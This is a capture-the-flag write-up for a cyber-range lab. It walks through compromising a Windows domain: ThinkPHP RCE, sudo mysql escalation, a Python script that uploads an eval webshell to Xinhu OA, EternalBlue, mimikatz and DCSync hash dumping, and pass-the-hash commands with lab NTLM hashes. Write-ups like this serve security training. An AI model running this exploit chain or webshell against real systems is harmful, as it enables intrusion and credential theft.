春秋云境 (Chunqiu Cloud Range) - Initial

flag01

Initial foothold: ThinkPHP 5.0.23 RCE on the Bootstrap Material Admin site at 172.22.1.15 (the fscan run below confirms it with poc-yaml-thinkphp5023-method-rce).

The shell is low-privileged, so enumerate SUID binaries first (stderr goes to /dev/null so permission-denied noise does not drown the list):

find / -user root -perm -4000 -print 2>/dev/null

Nothing familiar shows up, so check sudo -l.

mysql is allowed with sudo, and the mysql client can run shell commands, which is the route to root.
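Added example, not code from the original writeup: turn the `sudo -l` output into the escalation command it implies. The writeup only says that sudo -l lists mysql; the sudoers text below is a constructed sample of that situation (the user www-data, host ubuntu-web03 and the extra systemctl rule are assumptions). The mysql escape is the client's own `\! <command>` feature, which runs a shell command, so a mysql client that sudo starts as root hands back a root shell.

```python
"""Parse `sudo -l` output and map allowed binaries to known shell escapes.

Added example for this writeup; the sample sudoers text is constructed and
the user/host names in it are assumptions.
"""
import re

# Constructed sample of `sudo -l` output (user and host are assumed).
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on ubuntu-web03:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on ubuntu-web03:
    (root) NOPASSWD: /usr/bin/mysql
    (root) /usr/bin/systemctl status apache2
"""

# One rule line as printed by `sudo -l`: "(runas) [NOPASSWD:] /path/cmd [args]"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tag>(?:NO)?PASSWD:)?\s*(?P<cmd>\S+)(?P<args>.*)$"
)

# Shell escapes for binaries that often appear in sudoers (GTFOBins-style).
# "{sudo}" is replaced by "sudo /full/path/to/binary".
SHELL_ESCAPES = {
    "mysql": "{sudo} -e '\\! /bin/sh'",          # mysql client: \! runs a shell command
    "vim": "{sudo} -c ':!/bin/sh'",               # vim: ex command :! runs a shell
    "find": "{sudo} . -exec /bin/sh \\; -quit",   # find: -exec runs a program
}


def parse_sudo_l(text):
    """Return (runas, nopasswd, command, args) for every rule line in sudo -l output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults lines, headers, blank lines
        rules.append((m["runas"], m["tag"] == "NOPASSWD:", m["cmd"], m["args"].strip()))
    return rules


def escalation_commands(text):
    """Build a root-shell command for every rule that runs a known escapable binary as root.

    Rules that pin arguments are skipped: the escape needs its own -e/-c/-exec
    argument, and sudo would refuse anything but the listed one.
    """
    commands = []
    for runas, _nopasswd, cmd, args in parse_sudo_l(text):
        run_user = runas.split(":")[0].strip()   # "(root)", "(root : root)", "(ALL : ALL)"
        if run_user not in ("root", "ALL"):
            continue
        if args:
            continue
        template = SHELL_ESCAPES.get(cmd.rsplit("/", 1)[-1])
        if template:
            commands.append(template.format(sudo=f"sudo {cmd}"))
    return commands


if __name__ == "__main__":
    import sys
    text = SAMPLE_SUDO_L if sys.stdin.isatty() else sys.stdin.read()
    for command in escalation_commands(text):
        print(command)
```

Pipe the real `sudo -l` text into the script and it prints the exact command to type; for the sample above that is `sudo /usr/bin/mysql -e '\! /bin/sh'`, and the `systemctl status apache2` rule is ignored because its arguments are fixed.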

flag{60b53231-

Run fscan against the internal subnet:

[2025-03-10 17:44:52] [HOST] target:172.22.1.15 status:alive details:protocol=ICMP
[2025-03-10 17:44:52] [HOST] target:172.22.1.2 status:alive details:protocol=ICMP
[2025-03-10 17:44:52] [HOST] target:172.22.1.21 status:alive details:protocol=ICMP
[2025-03-10 17:44:52] [HOST] target:172.22.1.18 status:alive details:protocol=ICMP
[2025-03-10 17:44:55] [PORT] target:172.22.1.18 status:open details:port=80
[2025-03-10 17:44:55] [PORT] target:172.22.1.15 status:open details:port=80
[2025-03-10 17:44:55] [PORT] target:172.22.1.15 status:open details:port=22
[2025-03-10 17:44:55] [SERVICE] target:172.22.1.15 status:identified details:banner=SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5., port=22, service=ssh, version=8.2p1 Ubuntu 4ubuntu0.5, product=OpenSSH, os=Linux, info=Ubuntu Linux; protocol 2.0
[2025-03-10 17:44:55] [PORT] target:172.22.1.21 status:open details:port=139
[2025-03-10 17:44:55] [PORT] target:172.22.1.2 status:open details:port=139
[2025-03-10 17:44:55] [PORT] target:172.22.1.18 status:open details:port=135
[2025-03-10 17:44:55] [PORT] target:172.22.1.21 status:open details:port=135
[2025-03-10 17:44:55] [PORT] target:172.22.1.2 status:open details:port=135
[2025-03-10 17:44:55] [PORT] target:172.22.1.2 status:open details:port=88
[2025-03-10 17:44:55] [PORT] target:172.22.1.18 status:open details:port=445
[2025-03-10 17:44:55] [PORT] target:172.22.1.2 status:open details:port=445
[2025-03-10 17:44:55] [PORT] target:172.22.1.21 status:open details:port=445
[2025-03-10 17:44:55] [PORT] target:172.22.1.2 status:open details:port=389
[2025-03-10 17:44:56] [PORT] target:172.22.1.18 status:open details:port=139
[2025-03-10 17:44:56] [PORT] target:172.22.1.18 status:open details:port=3306
[2025-03-10 17:44:59] [SERVICE] target:172.22.1.18 status:identified details:port=3306, service=mysql, product=MySQL, info=unauthorized, banner=D.j Host '172.22.1.15' is not allowed to connect to this MySQL server
[2025-03-10 17:45:00] [SERVICE] target:172.22.1.21 status:identified details:port=139, service=unknown, banner=.
[2025-03-10 17:45:00] [SERVICE] target:172.22.1.2 status:identified details:port=139, service=unknown, banner=.
[2025-03-10 17:45:00] [SERVICE] target:172.22.1.2 status:identified details:service=unknown, port=88
[2025-03-10 17:45:00] [SERVICE] target:172.22.1.15 status:identified details:port=80, service=http
[2025-03-10 17:45:00] [SERVICE] target:172.22.1.18 status:identified details:port=80, service=http
[2025-03-10 17:45:00] [SERVICE] target:172.22.1.18 status:identified details:port=445, service=unknown
[2025-03-10 17:45:00] [SERVICE] target:172.22.1.2 status:identified details:port=445, service=unknown
[2025-03-10 17:45:00] [SERVICE] target:172.22.1.21 status:identified details:port=445, service=unknown
[2025-03-10 17:45:00] [SERVICE] target:172.22.1.2 status:identified details:service=ldap, product=Microsoft Windows Active Directory LDAP, os=Windows, info=Domain: xiaorang.lab, Site: Default-First-Site-Name, port=389
[2025-03-10 17:45:01] [SERVICE] target:172.22.1.18 status:identified details:port=139, service=unknown, banner=.
[2025-03-10 17:46:00] [SERVICE] target:172.22.1.18 status:identified details:port=135, service=unknown
[2025-03-10 17:46:00] [SERVICE] target:172.22.1.21 status:identified details:port=135, service=unknown
[2025-03-10 17:46:00] [SERVICE] target:172.22.1.2 status:identified details:port=135, service=unknown
[2025-03-10 17:46:00] [SERVICE] target:172.22.1.2 status:identified details:ipv6=[], hostname=DC01, ipv4=[172.22.1.2]
[2025-03-10 17:46:00] [SERVICE] target:172.22.1.21 status:identified details:hostname=XIAORANG-WIN7, ipv4=[172.22.1.21], ipv6=[]
[2025-03-10 17:46:00] [SERVICE] target:172.22.1.18 status:identified details:hostname=XIAORANG-OA01, ipv4=[172.22.1.18], ipv6=[]
[2025-03-10 17:46:00] [SERVICE] target:172.22.1.15 status:identified details:title=Bootstrap Material Admin, url=http://172.22.1.15, status_code=200, length=5578, server_info=map[content-type:text/html; charset=utf-8 date:Mon, 10 Mar 2025 09:46:00 GMT length:5578 server:Apache/2.4.41 (Ubuntu) status_code:200 title:Bootstrap Material Admin vary:Accept-Encoding], fingerprints=[], port=80, service=http
[2025-03-10 17:46:00] [SERVICE] target:172.22.1.18 status:identified details:status_code=302, length=0, server_info=map[cache-control:no-store, no-cache, must-revalidate content-length:0 content-type:text/html;charset=utf-8 date:Mon, 10 Mar 2025 09:46:00 GMT expires:Thu, 19 Nov 1981 08:52:00 GMT length:0 location:?m=login pragma:no-cache redirect_url:http://172.22.1.18?m=login server:Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9 set-cookie:PHPSESSID=bea71lrfvntpuv50vadmu4k2io; path=/ status_code:302 title:无标题 x-powered-by:PHP/7.1.9], fingerprints=[], port=80, service=http, title=无标题, url=http://172.22.1.18
[2025-03-10 17:46:01] [VULN] target:172.22.1.21 status:vulnerable details:port=445, vulnerability=MS17-010, os=Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[2025-03-10 17:46:01] [SERVICE] target:172.22.1.2 status:identified details:netbios_computer=DC01, workstation_service=DC01, server_service=DC01, port=139, computer_name=DC01.xiaorang.lab, domain_name=xiaorang.lab, netbios_domain=XIAORANG, domain_controllers=XIAORANG, os_version=Windows Server 2016 Datacenter 14393
[2025-03-10 17:46:01] [SERVICE] target:172.22.1.2 status:identified details:port=445, service=smb, os=Windows Server 2016 Datacenter 14393
[2025-03-10 17:46:01] [SERVICE] target:172.22.1.21 status:identified details:os_version=Windows Server 2008 R2 Enterprise 7601 Service Pack 1, port=139, computer_name=XIAORANG-WIN7.xiaorang.lab, domain_name=xiaorang.lab, netbios_domain=XIAORANG, netbios_computer=XIAORANG-WIN7, workstation_service=XIAORANG-WIN7, server_service=XIAORANG-WIN7
[2025-03-10 17:46:01] [SERVICE] target:172.22.1.18 status:identified details:netbios_domain=XIAORANG, netbios_computer=XIAORANG-OA01, workstation_service=XIAORANG-OA01, server_service=XIAORANG-OA01, os_version=Windows Server 2012 R2 Datacenter 9600, port=139, computer_name=XIAORANG-OA01.xiaorang.lab, domain_name=xiaorang.lab
[2025-03-10 17:46:01] [SERVICE] target:172.22.1.18 status:identified details:url=http://172.22.1.18?m=login, status_code=200, length=4012, server_info=map[cache-control:no-store, no-cache, must-revalidate content-type:text/html;charset=utf-8 date:Mon, 10 Mar 2025 09:46:01 GMT expires:Thu, 19 Nov 1981 08:52:00 GMT length:4012 pragma:no-cache server:Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9 set-cookie:PHPSESSID=nb8sjlpev1nspi1cmrebqc3mpb; path=/ status_code:200 title:信呼协同办公系统 x-powered-by:PHP/7.1.9], fingerprints=[], port=80, service=http, title=信呼协同办公系统
[2025-03-10 17:46:01] [VULN] target:http://172.22.1.15:80 status:vulnerable details:vulnerability_type=poc-yaml-thinkphp5023-method-rce, vulnerability_name=poc1, references=[https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce]

Three things stand out: DC01 (172.22.1.2) is the domain controller for xiaorang.lab, XIAORANG-WIN7 (172.22.1.21) is vulnerable to MS17-010, and XIAORANG-OA01 (172.22.1.18) runs 信呼协同办公系统 (Xinhu OA) on PHP 7.1.9.

flag02

Reference (Xinhu OA qcloudCosAction.php arbitrary file upload): Vulnerability-Wiki/docs-base/docs/oa/信呼 OA-qcloudCosAction.php-任意文件上传漏洞.md at master · Threekiii/Vulnerability-Wiki

The OA on 172.22.1.18 accepts the weak credentials admin:admin123.

# 1.php is the webshell uploaded by this script (contents shown below).
#
# Adjust before use:
#   url_pre = 'http://<IP>'
#   'adminuser': '<ADMINUSER_BASE64>',
#   'adminpass': '<ADMINPASS_BASE64>',

import requests

session = requests.session()
url_pre = 'http://172.22.1.18'   # no trailing slash; every path below starts with '/'
url1 = url_pre + '/?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'

# Login form: adminuser/adminpass are base64 of admin / admin123
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}

r = session.post(url1, data=data1)

# Upload the webshell; the server stores it with a .uptemp suffix
with open('1.php', 'rb') as f:
    r = session.post(url2, files={'file': f})
upload = r.json()
filepath = '/' + str(upload['filepath']).split('.uptemp')[0] + '.php'
print(filepath)

# The qcloudCos task renames the .uptemp upload back to its original .php name
url3 = url_pre + f"/task.php?m=qcloudCos|runt&a=run&fileid={upload['id']}"
r = session.get(url3)

# Confirm code execution; the shell reads $_POST[1], so the command goes in the POST body
r = session.post(url_pre + filepath, data={'1': "system('dir');"})
print(r.text)

1.php in the same directory:

<?php @eval($_POST[1]);?>

2ce3-4813-87d4-

flag03

Next is EternalBlue (MS17-010) against XIAORANG-WIN7 (172.22.1.21), which fscan flagged above.

Once it lands, connect over RDP directly.

Upload mimikatz and run it as administrator:

privilege::debug
sekurlsa::logonpasswords
lsadump::lsa /patch

That gives the machine account and the local Administrator:

XIAORANG-WIN7$:d7b3C5f125eb29c8f718687e3134b703

Administrator:48f6da83eb89a4da8a1cc963b855a799

Pass the Administrator hash with psexec to get a SYSTEM shell (empty LM half before the colon, NT hash after it):

psexec.py administrator@172.22.1.21 -hashes :48f6da83eb89a4da8a1cc963b855a799 -codec gbk

A DCSync attack is an Active Directory (AD) technique in which the attacker impersonates a domain controller (DC) and uses the legitimate directory replication protocol to pull account credentials (password hashes) from a real DC. It is typically used for privilege escalation and lateral movement and compromises the whole domain.

Required privileges (any one of):

Administrators

Domain Admins

Enterprise Admins

Domain controller computer accounts (members of the Domain Controllers group)

A custom account granted the replication rights ("Replicating Directory Changes" together with "Replicating Directory Changes All"; the first alone does not return secrets).

It seems that exploiting with msf already gives SYSTEM directly, so this privilege-escalation step is not needed. Run as SYSTEM on XIAORANG-WIN7, mimikatz talks to DC01 as the machine account XIAORANG-WIN7$, so the dump succeeding means that account holds replication rights in this lab.

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

Columns: RID, account, NTLM hash, userAccountControl (512 = normal account, 514 = normal account but disabled, 4096 = workstation trust account, 532480 = server trust account + trusted for delegation, i.e. the DC).

502   krbtgt           fb812eea13a18b7fcdb8e6d67ddc205b   514
1106  Marcus           e07510a4284b3c97c8e7dee970918c5c   512
1107  Charles          f6a9881cd5ae709abb4ac9ab87f24617   512
1000  DC01$            f3328438b5155409528f398024d188a5   532480
500   Administrator    10cf89a850fb1cdbe6bb432b859164c8   512
1104  XIAORANG-OA01$   a962df35d97691fd6ceb766e9577f8f0   4096
1108  XIAORANG-WIN7$   d7b3c5f125eb29c8f718687e3134b703   4096

Pass the hash to the DC with crackmapexec. Note that this domain Administrator hash (10cf89a850fb1cdbe6bb432b859164c8) is not the local Administrator hash dumped from XIAORANG-WIN7's SAM earlier (48f6da83eb89a4da8a1cc963b855a799); the domain one is the one that works against DC01:

crackmapexec.exe smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "whoami"

flag03: e8f88d0d43d6}